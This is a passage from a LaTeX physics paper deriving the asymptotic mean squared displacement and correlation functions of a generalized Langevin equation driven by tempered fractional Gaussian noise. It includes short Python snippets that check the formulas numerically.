\simeq D\frac{4\Gamma^2(H+\frac{1}{2})}{(2\lambda)^{2H+1}}\Delta^{2H}t^{-1},
\end{eqnarray}
where
$D=\int_0^{\infty}\rmd\tau[(1+\tau)^{H-\frac{1}{2}}\rme^{-\lambda\Delta(1+\tau)}+|\tau-1|^{H-\frac{1}{2}}\rme^{-\lambda|\Delta(\tau-1)|}-2\tau^{H-\frac{1}{2}}\rme^{-\lambda\Delta\tau}]^2$.
Thus we have $E_B(B_{\alpha,\lambda}(t))\simeq 4D\Gamma^2(H+1/2)/[(2\lambda)^{2H+1}C_{\Delta}^4\Delta^{2H}]t^{-1}$, which tends to zero at the rate $t^{-1}$ for $H \in (0,1)$ as $t\rightarrow\infty$.
The simulation result for ergodicity breaking parameter $E_B(B_{\alpha,\lambda}(t))$ is shown in Figure \ref{fig:0}.
On the other hand, for the limit $\lambda t\rightarrow0$, $C_t^2$ tends to a constant. In this case, (\ref{covariance}) reduces to the covariance function of fractional Brownian motion (fBm). Then the evolution of the ergodicity breaking parameter $E_B(B_{\alpha,\lambda}(t))$ is recovered to that of fBm \cite{Deng}.
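Equation (\ref{qi}) rests on the stationarity of tfBm increments: from the covariance (\ref{covariance}), $\textrm{Var}[B_{\alpha,\lambda}(t+\Delta)-B_{\alpha,\lambda}(t)]=C_\Delta^2\Delta^{2H}$ for every $t$. A self-contained numerical check of this property (a sketch, not part of the original derivation):

```python
import numpy as np
from scipy.special import gamma, kv

H, lam, Delta = 0.7, 0.1, 1.0

def C2(t):
    """C_t^2 (Bessel-K closed form from the text), with C_0^2 = 0."""
    if t == 0.0:
        return 0.0
    z = 2.0 * lam * abs(t)
    return (2.0 * gamma(2.0 * H) / z**(2.0 * H)
            - 2.0 * gamma(H + 0.5) * kv(H, lam * abs(t)) / (np.sqrt(np.pi) * z**H))

def cov(t, s):
    """Cov[B(t), B(s)] from the tfBm covariance formula."""
    f = lambda u: C2(u) * abs(u)**(2.0 * H)
    return 0.5 * (f(t) + f(s) - f(t - s))

target = C2(Delta) * Delta**(2.0 * H)   # C_Delta^2 Delta^{2H}
for t in (0.5, 3.0, 20.0):
    inc_var = cov(t + Delta, t + Delta) + cov(t, t) - 2.0 * cov(t + Delta, t)
    print(t, inc_var, target)           # increment variance is independent of t
```

The increment variance equals $C_\Delta^2\Delta^{2H}$ identically, which is why the time average $\langle\bar{\delta}^2\rangle$ matches the ensemble variance at all measurement times.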
\begin{figure}
\flushright
\includegraphics[scale=0.4]{0eps.eps}\includegraphics[scale=0.4]{01eps.eps}
\caption{Solid (red) lines are the simulation results for $E_B(x(t))$. The parameters $H$, $\lambda$, $\Delta$, and $T$ are, respectively, taken as $H=0.8$ (left panel (a)), $H=0.4$ (right panel (b)), $\lambda=0.1$, $\Delta=1$, and $T=300$. Averages are taken over 5000 sampled trajectories.
}
\label{fig:0}
\end{figure}
\subsection{Tempered fractional Gaussian noise}
Given a tfBm (\ref{PDF}), we can define the tempered fractional Gaussian noise (tfGn)
\begin{eqnarray}\label{2.9}
\gamma(t)=\frac{B_{\alpha,\lambda}(t+h)-B_{\alpha,\lambda}(t)}{h},
\end{eqnarray}
being similar to the definition of fractional Gaussian noise (fGn) \cite{Mandelbrot:68}, where $h$ is small and $h\ll t$.
Based on the covariance function (\ref{covariance}) of $B_{\alpha,\lambda}(t)$ and its zero mean, one can easily obtain that the mean of tfGn is $\langle \gamma(t)\rangle=0$ and its covariance is
\begin{eqnarray*}
\fl \langle\gamma(t_1)\gamma(t_2)\rangle
=\frac{1}{h^2}\langle(B_{\alpha,\lambda}(t_1+h)-B_{\alpha,\lambda}(t_1))(B_{\alpha,\lambda}(t_2+h)-B_{\alpha,\lambda}(t_2))\rangle \nonumber \\
\fl\qquad\quad\qquad=\frac{1}{2h^2}(C_{t_1-t_2+h}^2|t_1-t_2+h|^{2H}+C_{t_1-t_2-h}^2|t_1-t_2-h|^{2H}-2C_{t_1-t_2}^2|t_1-t_2|^{2H}),
\end{eqnarray*}
which means that the tfGn is a stationary Gaussian process.
For a fixed $\lambda$, the asymptotic behavior of the covariance function is $\langle\gamma(0)\gamma(t)\rangle\simeq-\Gamma(H+1/2)\lambda^2(2\lambda)^{-H-1/2}t^{H-1/2}\rme^{-\lambda t}$ for large $ t$ and $\langle\gamma(0)\gamma(t)\rangle\simeq C_t^2H(2H-1)t^{2H-2}$, where $C_t^2$ approaches a positive constant, for small $ t$ (for the details of the derivation, see \ref{AppendixB}).
\section{Generalized Langevin equation with tempered fractional Gaussian noise}\label{three}
\setcounter{equation}{0}
We discuss the dynamics of the generalized Langevin equation with tempered fractional Gaussian noise for free particles, including the underdamped and overdamped cases. The properties of the correlation function of the equation under external potential are also discussed.
\subsection{Dynamical behaviors for free particles}
\subsubsection{Underdamped generalized Langevin equation}
We know that for large $t$ the MSD of fBm goes like $ t^{2H}$ while that of the corresponding fractional Langevin equation goes like $ t^{2-2H}$. In the above section, it is shown that tfBm is localized, i.e., its MSD goes like $t^0$. Can we then expect that the MSD of the tfLe goes like $t^2$ for large $t$? The answer is yes.
Based on the second fluctuation-dissipation theorem \cite{Kubo}, which links the dissipation memory kernel $K(t)$ with the autocorrelation function of internal noise $F(t)$: $\langle F(t_1)F(t_2)\rangle=k_BT\xi K(t_1-t_2)$, the tfLe can be written as
\begin{eqnarray}\label{PDC}
m\frac{\rmd ^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau+F(t),
\end{eqnarray}
with $\dot x(0)=v_0$, $x(0)=0$, where $v_0$ is the initial velocity, $F(t)=\sqrt{2k_BT\xi}\gamma(t)$ is the internal noise with tfGn $\gamma(t)$, and $K(t)=2\langle\gamma(0)\gamma(t)\rangle=\frac{1}{h^2}(C_{t+h}^2|t+h|^{2H}+C_{t-h}^2|t-h|^{2H}-2C_t^2|t|^{2H})$ with $0<H<1$.
In this case, the fluctuation and dissipation stem from the same source and the system will finally reach the equilibrium state.
Taking Laplace transform of (\ref{PDC}) leads to
\begin{eqnarray} \label{3.2}
x(s)=\frac{F(s)+mv_0}{ms^2+\xi s K(s)}.
\end{eqnarray}
For convenience, denoting $C_t^2t^{2H}$ by $f(t)$, then $K(s)=\mathcal{L}[K(t)]=\frac{1}{h^2}(\rme^{sh}f(s)+\rme^{-sh}f(s)-2f(s))$. No matter whether $s\rightarrow0$ or $s\rightarrow\infty$, $sh$ is always small since $h\ll t$. So, with a Taylor series expansion, we have $K(s)\simeq s^2f(s)$ for $s\rightarrow0$ or $s\rightarrow\infty$. That is to say, the asymptotic expression of $x(s)$ is
\begin{eqnarray}\label{PDW}
x(s)\simeq\frac{F(s)+mv_0}{ms^2+\xi s^3 f(s)}
\end{eqnarray}
and
\begin{eqnarray}\label{PDWX}
v(s)\simeq\frac{F(s)+mv_0}{ms+\xi s^2 f(s)}.
\end{eqnarray}
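The approximation $K(s)\simeq s^2f(s)$ used above follows from expanding $(\rme^{sh}+\rme^{-sh}-2)/h^2$ for small $sh$; it can be confirmed symbolically, e.g., with SymPy:

```python
import sympy as sp

s, h = sp.symbols('s h', positive=True)
# K(s) = kernel_factor * f(s); expand the factor in powers of s
kernel_factor = (sp.exp(s*h) + sp.exp(-s*h) - 2) / h**2
expansion = sp.series(kernel_factor, s, 0, 5).removeO()
print(expansion)  # leading term s**2; first correction h**2 s**4 / 12
```

Since $h\ll t$ (i.e., $sh\ll1$ in both limits considered), the correction of relative order $(sh)^2/12$ is negligible, which justifies $K(s)\simeq s^2f(s)$.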
Based on (\ref{PDW}) and (\ref{PDWX}), we do the dynamics analysis for different cases.
\textit{Case I} ($t$ is large, i.e., $s \rightarrow 0$, and $H \in (0,1)$): For moderate $\lambda$, $\lambda t$ is large, say, $\lambda t> 10$. Then $f(t)=C_t^2t^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$.
By final value theorem, we have $\lim\limits_{s\to0}f(s)=2\Gamma(2H)(2\lambda)^{-2H}/s$; substituting it into (\ref{PDW}) leads to
\begin{eqnarray}
x(s)\simeq\frac{F(s)+mv_0}{As^2}
\end{eqnarray}
with $A=m+2\xi \Gamma(2H)(2\lambda)^{-2H}$.
Then
\begin{eqnarray}
x(t)\simeq\frac{1}{A}\int_0^t\tau F(t-\tau)\rmd\tau+\frac{mv_0}{A}t.
\end{eqnarray}
Hence $\langle x(t)\rangle\simeq\frac{mv_0}{A}t$ for large $t$, and
\begin{eqnarray}
\langle x^2(t)\rangle\simeq\frac{2}{A^2}\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1t_1t_2\langle F(t-t_1)F(t-t_2)\rangle+\frac{m^2v_0^2}{A^2}t^2,
\end{eqnarray}
with
$\langle F(t-t_1)F(t-t_2)\rangle=k_BT\xi h^{-2}
(C_{t_1-t_2+h}^2|t_1-t_2+h|^{2H}+C_{t_1-t_2-h}^2|t_1-t_2-h|^{2H}-2C_{t_1-t_2}^2|t_1-t_2|^{2H})$.
Let $g(t_1)=\int_0^{t_1}t_2\langle F(t-t_1)F(t-t_2)\rangle \rmd t_2$. Using the property of convolution and Taylor's series expansion, we have $g(s)=\mathcal{L}[g(t_1)]\simeq k_BT\xi f(s)$. So $g(t_1)\simeq k_BT\xi f(t_1)$ for large $t_1$. Then
\begin{eqnarray}\label{xx}
\langle x^2(t)\rangle&\simeq\frac{2}{A^2}\int_0^tt_1g(t_1)\rmd t_1+\frac{m^2v_0^2}{A^2}t^2 \nonumber\\
&\simeq\frac{2k_BT\xi}{A^2}\int_0^tt_1C_{t_1}^2t_1^{2H}\rmd t_1+\frac{m^2v_0^2}{A^2}t^2 \nonumber\\
&\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t^2
\end{eqnarray}
for $t\rightarrow\infty$. Eq. (\ref{xx}) is confirmed by the numerical simulations; see Figure \ref{fig:1}. And the MSD of the system is
\begin{eqnarray}
\langle(\Delta x)^2\rangle=\langle[x(t)-\langle x(t)\rangle]^2\rangle
\simeq\frac{2k_BT\xi\Gamma(2H)}{A^2(2\lambda)^{2H}}t^2,
\end{eqnarray}
displaying the ballistic diffusion.
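Since for large $t$ one has $x(t)-\langle x(t)\rangle\simeq(\sqrt{2k_BT\xi}/A)\int_0^tB_{\alpha,\lambda}(u)\rmd u$ (integrating $\int_0^t\tau F(t-\tau)\rmd\tau$ by parts), the ballistic MSD above can be checked deterministically by double quadrature of the tfBm covariance (\ref{covariance}); a sketch for the parameters of Figure~\ref{fig:1}:

```python
import numpy as np
from scipy.special import gamma, kv

H, lam, kBT, xi, m = 0.7, 0.1, 1.0, 1.0, 1.0   # parameters of Figure 2
A = m + 2.0 * xi * gamma(2.0 * H) / (2.0 * lam)**(2.0 * H)

def f(t):
    """f(t) = C_t^2 |t|^{2H} from the tfBm covariance, with f(0) = 0."""
    t = np.abs(np.asarray(t, dtype=float))
    out = np.zeros_like(t)
    mask = t > 0
    z = 2.0 * lam * t[mask]
    Ct2 = (2.0 * gamma(2.0 * H) / z**(2.0 * H)
           - 2.0 * gamma(H + 0.5) * kv(H, lam * t[mask]) / (np.sqrt(np.pi) * z**H))
    out[mask] = Ct2 * t[mask]**(2.0 * H)
    return out

tf = 500.0
u = np.linspace(0.0, tf, 801)
cov = 0.5 * (f(u)[:, None] + f(u)[None, :] - f(u[:, None] - u[None, :]))
w = np.full(u.size, u[1] - u[0]); w[0] = w[-1] = 0.5 * (u[1] - u[0])  # trapezoid weights
msd = (2.0 * kBT * xi / A**2) * (w @ cov @ w)   # <(Delta x)^2> at t = tf
predicted = 2.0 * kBT * xi * gamma(2.0 * H) / (A**2 * (2.0 * lam)**(2.0 * H)) * tf**2
print(msd / predicted)   # -> close to 1 (ballistic law)
```

The small residual deviation from unity is the finite-time correction, which decays as $t^{-2}$ once $\lambda t\gg1$.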
\begin{figure}
\flushright
\includegraphics[scale=0.37]{1eps.eps}\\
\caption{Theoretical result (\ref{xx}) (black dashed line) and computer simulation one sampled over 1000 trajectories (red solid line), plotted for $H=0.7$, $\lambda=0.1$, $T=500$, $k_BT=1$, $\xi=1$, $m=1$, and $v_0=1$.
}\label{fig:1}
\end{figure}
Besides, let us further consider the autocorrelation function of the position $x(t)$. After making double Laplace transforms of the autocorrelation function of internal noise $\langle F(t_1)F(t_2)\rangle$, we have
\begin{eqnarray}
\langle F(s_1)F(s_2)\rangle=k_BT\xi\frac{s_1^2f(s_1)+s_2^2f(s_2)}{s_1+s_2}.
\end{eqnarray}
Then
\begin{eqnarray}\label{ii}
\langle x(s_1)x(s_2)\rangle&=\frac{\langle F(s_1)F(s_2)\rangle+m^2v_0^2}{A^2s_1^2s_2^2}\nonumber\\
&=\frac{k_BT\xi}{A^2}\frac{s_1^2f(s_1)+s_2^2f(s_2)}{(s_1+s_2)s_1^2s_2^2}+\frac{1}{A^2}\frac{m^2v_0^2}{s_1^2s_2^2}.
\end{eqnarray}
Taking inverse Laplace transforms of (\ref{ii}) and letting $t_1, t_2$ tend to infinity, we obtain
\begin{eqnarray}
\langle x(t_1)x(t_2)\rangle \simeq\left(\frac{2k_BT\xi\Gamma(2H)}{A^2(2\lambda)^{2H}}+\frac{m^2v_0^2}{A^2}\right) t_1t_2,
\end{eqnarray}
which results in (\ref{xx}) when $t_1=t_2$.
Furthermore, if $\lambda$ is moderate and $t\rightarrow\infty$, the velocity
\begin{eqnarray}
v(t)&\simeq\frac{1}{A}\int_0^t F(\tau)\rmd\tau+\frac{mv_0}{A}
=\frac{\sqrt{2k_BT\xi}}{A}B_{\alpha,\lambda}(t)+\frac{mv_0}{A}.
\end{eqnarray}
Then we have $\langle v(t)\rangle\simeq\frac{mv_0}{A}$ and the autocorrelation function of $v(t)$ is
\begin{eqnarray}\label{vv}
\langle v(t_1)v(t_2)\rangle&\simeq\frac{2k_BT\xi}{A^2}\langle B_{\alpha,\lambda}(t_1)B_{\alpha,\lambda}(t_2)\rangle+\frac{m^2v_0^2}{A^2}\nonumber\\
&=\frac{k_BT\xi}{A^2}(C_{t_1}^2t_1^{2H}+C_{t_2}^2t_2^{2H}-C_{t_1-t_2}^2|t_1-t_2|^{2H})+\frac{m^2v_0^2}{A^2}.
\end{eqnarray}
If $t_1=t_2=t$, then
\begin{eqnarray}
\langle v^2(t)\rangle
&=\frac{2k_BT\xi}{A^2}C_t^2t^{2H}+\frac{m^2v_0^2}{A^2}\simeq \frac{4k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}
\end{eqnarray}
as $t\rightarrow\infty$. From (\ref{vv}), the second moment of position $x(t)$ is
\begin{eqnarray}
\fl\langle x^2(t)\rangle
=2\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1\langle v(t_1)v(t_2)\rangle\nonumber\\
\fl\qquad\quad=\frac{2k_BT\xi}{A^2}\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1(C_{t_1}^2{t_1}^{2H}+C_{t_2}^2{t_2}^{2H}-C_{t_1-t_2}^2|t_1-t_2|^{2H})+\frac{m^2v_0^2}{A^2}t^2\nonumber\\
\fl\qquad\quad\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t^2,
\end{eqnarray}
where $C_t^2t^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$ for large $\lambda t$ is used; Eq. (\ref{xx}) is confirmed again. The correlation function of $x(t)$ and $v(t)$ is
\begin{eqnarray}
\langle x(t)v(t)\rangle&=\frac{1}{2}\frac{\rmd\langle x^2(t)\rangle}{\rmd t}\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t.
\end{eqnarray}
\textit{Remark}: There is another way to obtain the asymptotic expression of $f(s)$ for small $s$. By using the formula \cite{Srivastava}:
\begin{eqnarray*}
I_{\rho}^{\mu}(s)&=\int_0^{\infty}\rme^{-st}t^{\mu-1}K_{\nu}(\alpha t^{\rho})\rmd t\nonumber\\
&=\frac{2^{(\mu-2\rho)/\rho}}{\rho \alpha^{\mu/\rho}}\sum_{n=0}^{\infty}\frac{(-s)^n}{n!}\Big(\frac{2}{\alpha}\Big)^{n/\rho}\Gamma\Big(\frac{\mu+n}{2\rho}-\frac{1}{2}\nu\Big)\Gamma\Big(\frac{\mu+n}{2\rho}+\frac{1}{2}\nu\Big),
\end{eqnarray*}
where $\rho>0$, $\rm{Re}(s)>0$, $ \rm{Re}(\alpha)>0$, $\rm{Re}(\mu/\rho)>|\rm{Re}(\nu)|$ and $K_{\nu}(\alpha t)$ is the modified Bessel function of the second kind, we obtain the Laplace transform of $f(t)\,(=C_t^2t^{2H})$ as
\begin{eqnarray*}
\fl f(s)=\frac{2\Gamma(2H)(2\lambda)^{-2H}}{s}-\frac{\Gamma(H+\frac{1}{2})}{\sqrt{\pi}\lambda^{2H+1}}\sum_{n=0}^{\infty}\frac{(-s)^n}{n!}\Big(\frac{2}{\lambda}\Big)^n\Gamma\Big(\frac{H+1+n}{2}-\frac{1}{2}H\Big)\Gamma\Big(\frac{H+1+n}{2}+\frac{1}{2}H\Big).
\end{eqnarray*}
So $f(s) \simeq\frac{2\Gamma(2H)(2\lambda)^{-2H}}{s}$ for small $s$.
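The small-$s$ limit $f(s)\simeq2\Gamma(2H)(2\lambda)^{-2H}/s$ can also be checked by numerical quadrature of the Laplace integral; a sketch (the tail beyond a large cutoff $T$ is added analytically, since $f(t)$ has reached its plateau there):

```python
import numpy as np
from scipy.special import gamma, kv
from scipy.integrate import quad

H, lam = 0.7, 0.5
plateau = 2.0 * gamma(2.0 * H) / (2.0 * lam)**(2.0 * H)

def f(t):
    """f(t) = C_t^2 t^{2H} (Bessel-K closed form from the text)."""
    z = 2.0 * lam * t
    Ct2 = (2.0 * gamma(2.0 * H) / z**(2.0 * H)
           - 2.0 * gamma(H + 0.5) * kv(H, lam * t) / (np.sqrt(np.pi) * z**H))
    return Ct2 * t**(2.0 * H)

s, T = 1.0e-3, 5.0e3
val, _ = quad(lambda t: np.exp(-s * t) * f(t), 0.0, T, limit=300)
fs = val + plateau * np.exp(-s * T) / s    # analytic tail, f(t) ~ plateau for t > T
print(s * fs, plateau)                     # s f(s) -> 2 Gamma(2H) (2 lam)^{-2H}
```

The residual difference is $O(s)$ relative to the leading $1/s$ term, consistent with the series above.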
\textit{Case II} ($s$ is large, i.e., $t \rightarrow 0$, and $H \in (\frac{1}{2},1)$):
For moderate or small $\lambda$, $\lambda t\rightarrow0$. Then we have $C_t^2\simeq 2D_H\Gamma^2(H+1/2)$ and $f(t)\simeq 2D_H\Gamma^2(H+1/2)t^{2H}$ with its Laplace transform $f(s) \simeq 2D_H\Gamma^2(H+1/2)\Gamma(2H+1)s^{-1-2H}$. So (\ref{PDW}) becomes
\begin{eqnarray} \label{3.18}
x(s)\simeq\frac{F(s)+mv_0}{ms^2+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H} }\simeq\frac{F(s)+mv_0}{ms^2}
\end{eqnarray}
for large $s$. Taking inverse Laplace transform on Eq. (\ref{3.18}) leads to
\begin{eqnarray}
x(t)\simeq\frac{1}{m}\int_0^t\tau F(t-\tau)\rmd\tau+v_0t.
\end{eqnarray}
Then the mean $\langle x(t)\rangle\simeq v_0t$. Similarly to the case $t\rightarrow \infty$, we obtain
\begin{eqnarray}\label{xiao}
\langle x^2(t)\rangle&\simeq\frac{2}{m^2}\int_0^t\int_0^{\tau_1}\rmd\tau_2\rmd\tau_1\tau_1\tau_2\langle F(t-\tau_1)F(t-\tau_2)\rangle+v_0^2t^2\nonumber \\
&=\frac{8D_H\Gamma^2(H+\frac{1}{2})k_BT\xi}{m^2}\int_0^t\tau_1^{2H+1}\rmd\tau_1+v_0^2t^2\nonumber\\
&=\frac{4D_H\Gamma^2(H+\frac{1}{2})k_BT\xi}{m^2(H+1)}t^{2H+2}+v_0^2t^2\nonumber\\
&\simeq v_0^2t^2
\end{eqnarray}
for small $t$. Note that for short times we have $\langle x^2(t)\rangle\simeq\frac{k_BT}{m}t^2$ if the thermal initial condition $\langle v_0^2\rangle=\frac{k_BT}{m}$ is assumed. Figure \ref{2} numerically confirms the theoretical result. Naturally, in this case, $v(t)\simeq \frac{1}{m}\int_0^tF(\tau)\rmd\tau+v_0$. So $\langle v(t)\rangle\simeq v_0$ and $\langle v^2(t)\rangle\simeq\frac{4k_BT\xi D_H\Gamma^2(H+\frac{1}{2})}{m^2}t^{2H}+v_0^2\simeq v_0^2$ for small $t$.
\begin{figure}
\flushright
\includegraphics[scale=0.37]{2eps.eps}\\
\caption{Theoretical result (\ref{xiao}) (blue dashed line) and numerical one sampled over $1000$ trajectories (red solid line), plotted for $H=0.8$, $\lambda=0.1$, $T=100$, and $v_0=1$. }\label{2}
\end{figure}
\textit{Case III} ($\lambda$ is small, $t$ is large, and $H \in (\frac{1}{2},1)$):
If $\lambda t\rightarrow\infty$, it reduces to \textit{Case I}. Now we only consider the case that $\lambda t$ is small. As in the second case, when $\lambda t$ is small, $C_t^2\simeq 2D_H\Gamma^2(H+1/2)$. Then (\ref{PDW}) becomes
\begin{eqnarray}
x(s)&\simeq\frac{F(s)+mv_0}{ms^2+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H} }\nonumber\\
&\simeq\frac{F(s)+mv_0}{2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H}}
\end{eqnarray}
for small $s$, which has the inverse Laplace transform
\begin{eqnarray}
x(t)\simeq P\int_0^tF(t-\tau)\tau^{1-2H}\rmd\tau+mv_0 P t^{1-2H}
\end{eqnarray}
with $P=\frac{1}{2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(2-2H)}$. So finally we obtain $\langle x(t)\rangle\simeq mv_0 P t^{1-2H}$ and the MSD is
\begin{eqnarray}\label{zhong}
\langle x^2(t)\rangle\simeq\frac{k_BT}{\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(3-2H)}t^{2-2H}.
\end{eqnarray}
Similarly, $v(t)\simeq\frac{1}{m}\int_0^tF(\tau)E_{2H}(-B(t-\tau)^{2H})\rmd\tau+v_0E_{2H}(-Bt^{2H})$ by making the inverse Laplace transform of $v(s)\simeq\frac{F(s)+mv_0}{ms+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{1-2H} }$, where $B=2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)m^{-1}$ and $E_{\alpha}(z)$ is the particular case of the generalized Mittag-Leffler function \cite{Podlubny}
\begin{eqnarray}
E_{\alpha,\beta}(z)=\sum_{k=0}^{\infty}\frac{z^k}{\Gamma(\alpha k+\beta)},\qquad\alpha>0,\qquad \beta>0 \nonumber
\end{eqnarray}
with $E_{\alpha}(z)=E_{\alpha,1}(z)$. The asymptotic expression of the generalized Mittag-Leffler function for $z\rightarrow\infty$ is $E_{\alpha,\beta}(-z)\simeq\frac{z^{-1}}{\Gamma(\beta-\alpha)}$, where $0<\alpha<1$ or $1<\alpha<2$.
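As a quick numerical aid, the generalized Mittag-Leffler function defined above can be evaluated by truncating the series for moderate $|z|$. The following sketch is not part of the original analysis; the function name and truncation length are our own choices:

```python
from math import gamma

def mittag_leffler(z, alpha, beta=1.0, n_terms=60):
    """Truncated series E_{alpha,beta}(z) = sum_k z^k / Gamma(alpha*k + beta).

    Suitable for moderate |z|; for z -> -infinity one should instead use the
    asymptotic form E_{alpha,beta}(-z) ~ z^{-1} / Gamma(beta - alpha).
    """
    return sum(z**k / gamma(alpha * k + beta) for k in range(n_terms))
```

Simple sanity checks are the special cases $E_{1,1}(z)=e^z$ and $E_{2,1}(-z^2)=\cos z$.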
It can be noted that $\langle F(t_1)F(t_2)\rangle\simeq4k_BT\xi D_H\Gamma^2(H+1/2)H(2H-1)|t_1-t_2|^{2H-2}$ when $\lambda t$ is small, which is similar to the autocorrelation function of fGn \cite{Deng}; moreover, the expression of $v(t)$ is similar to that of the fLe. So in this case, the asymptotic behavior of $\langle v(t)\rangle$ and $\langle v^2(t)\rangle$ is consistent with that of the fLe. Thus $\langle v(t)\rangle\simeq v_0E_{2H}(-Bt^{2H})$ decays like $t^{-2H}$ and $\langle v^2(t)\rangle$ decays like $t^{-4H}$ for large $t$ \cite{Eric}.
From the above discussions, we know that the MSD of the tfLe strongly depends on the values of $\lambda$ and $t$. When $\lambda t$ is small, it displays the same asymptotic behavior as that of the fLe \cite{Deng}. As time goes on, for fixed $\lambda$ the MSD of the tfLe transitions as $t^2\to t^{2-2H}\to t^2$; the smaller $\lambda$ is, the longer the MSD behaves as $t^{2-2H}$. See Figure \ref{3} for a demonstration of these results.
\begin{figure}
\flushright
\includegraphics[scale=0.37]{3eps.eps}\\
\caption{Theoretical results (\ref{xiao}) (blue dashed line), (\ref{zhong}) (green dotted-dashed line), (\ref{xx}) (black solid line), and numerical result sampled over $1000$ trajectories (red data points), plotted for $H=0.7$, $\lambda=0.001$, $T=2\times 10^4$, $k_BT=1$, $\xi=1$, $m=1$, $v_0=1$, and $D_H=\frac{1}{2}$.
}\label{3}
\end{figure}
\subsubsection{Overdamped generalized Langevin equation}
The overdamped generalized Langevin equation without Newton's acceleration term reads as
\begin{eqnarray}
0=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau+F(t),
\end{eqnarray}
where $K(t)$ and $F(t)$ are the same as the ones in Eq. (\ref{PDC}). For moderate $\lambda$, following the same procedure as in the above subsection, we can easily obtain that $\langle x(t)\rangle=0$ and
\begin{eqnarray}\label{over1}
\langle x^2(t)\rangle\simeq\frac{2k_BT\xi\Gamma(2H)}{(2\xi\Gamma(2H)(2\lambda)^{-2H})^2(2\lambda)^{2H}}t^2
\end{eqnarray}
for large $t$, being the same as the underdamped case (\ref{PDC}). For short times,
\begin{eqnarray}
x(t)\simeq\frac{1}{2D_H\Gamma^2(H+\frac{1}{2})\xi\Gamma(2H+1)\Gamma(2-2H)}\int_0^tF(t-\tau)\tau^{1-2H}\rmd\tau;
\end{eqnarray}
then we have $\langle x(t)\rangle=0$ and the MSD
\begin{eqnarray}\label{over2}
\langle x^2(t)\rangle\simeq\frac{k_BT}{\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(3-2H)}t^{2-2H}.
\end{eqnarray}
It can be noted that the MSD of the overdamped tfLe transitions from $t^{2-2H}$ at short times to $t^2$ at long times, and it behaves the same as that of the overdamped fLe \cite{Deng} for small $\lambda t$. See Figure \ref{3-1} for the numerical simulations, which verify (\ref{over1}) and (\ref{over2}).
\begin{figure}
\flushright
\includegraphics[scale=0.37]{31eps.eps}\\
\caption{Theoretical results (\ref{over2}) (blue dashed line) and (\ref{over1}) (black dotted-dashed line), and numerical result sampled over $1000$ trajectories (red solid line), plotted for $H=0.6$, $\lambda=0.1$, $T=500$, $k_BT=1$, $\xi=1$, and $D_H=\frac{1}{2}$.
}\label{3-1}
\end{figure}
\subsection{Harmonic potential}
Now we further consider the tfLe (\ref{PDC}) with external potential $U(x)$, i.e.,
\begin{eqnarray}
m\frac{\rmd^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau-U'(x)+F(t),
\end{eqnarray}
where $-U'(x)$ is an external force. If the external potential is a harmonic potential $U(x)=\frac{1}{2}m\omega^2x^2(t)$, where $\omega$ is the frequency of the oscillator, then we have
\begin{eqnarray}\label{ex}
m\frac{\rmd^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau-m\omega^2x(t)+F(t).
\end{eqnarray}
In what follows we analyze the normalized displacement correlation function, which is defined by
\begin{eqnarray}
C_x(t)=\frac{\langle x(t)x(0)\rangle}{\langle x^2(0)\rangle},\nonumber
\end{eqnarray}
under the thermal initial conditions $\langle F(t)x(0)\rangle=0$, $\langle x^2(0)\rangle=\frac{k_BT}{m\omega^2}$, and $\langle x(0)v(0)\rangle=0$. Making Laplace transform of (\ref{ex}) leads to
\begin{eqnarray}
x(s)=\frac{(ms+\xi K(s))x(0)+F(s)+mv(0)}{ms^2+\xi s K(s)+m\omega^2}.
\end{eqnarray}
Then
\begin{eqnarray}
C_x(s)=\frac{\langle x(s)x(0)\rangle}{\langle x^2(0)\rangle}=\frac{ms+\xi K(s)}{ms^2+\xi s K(s)+m\omega^2},
\end{eqnarray}
which results in
\begin{eqnarray}
C_x(t)=1-m\omega^2I(t)
\end{eqnarray}
with $I(s)=\frac{s^{-1}}{ms^2+\xi s K(s)+m\omega^2}$.
$K(s)$ and $f(t)$ are given below Eq. (\ref{3.2}). Here we carefully take the asymptotic expression of $f(t)$ as
\begin{eqnarray}
f(t)\simeq \frac{2 \Gamma(2H)}{(2\lambda)^{2H}}-\frac{2 \Gamma(H+\frac{1}{2})}{(2\lambda)^{H+\frac{1}{2}}}t^{H-\frac{1}{2}}\rme^{-\lambda t}.
\end{eqnarray}
Then
\begin{eqnarray} \label{3.34}
I(s)\simeq\frac{s^{-1}}{as^2-bs^3(s+\lambda)^{-H-\frac{1}{2}}+m\omega^2},
\end{eqnarray}
where $a=m+2\xi \Gamma(2H)(2\lambda)^{-2H}$ and $b=2\xi \Gamma(H+\frac{1}{2})^2(2\lambda)^{-H-\frac{1}{2}}$.
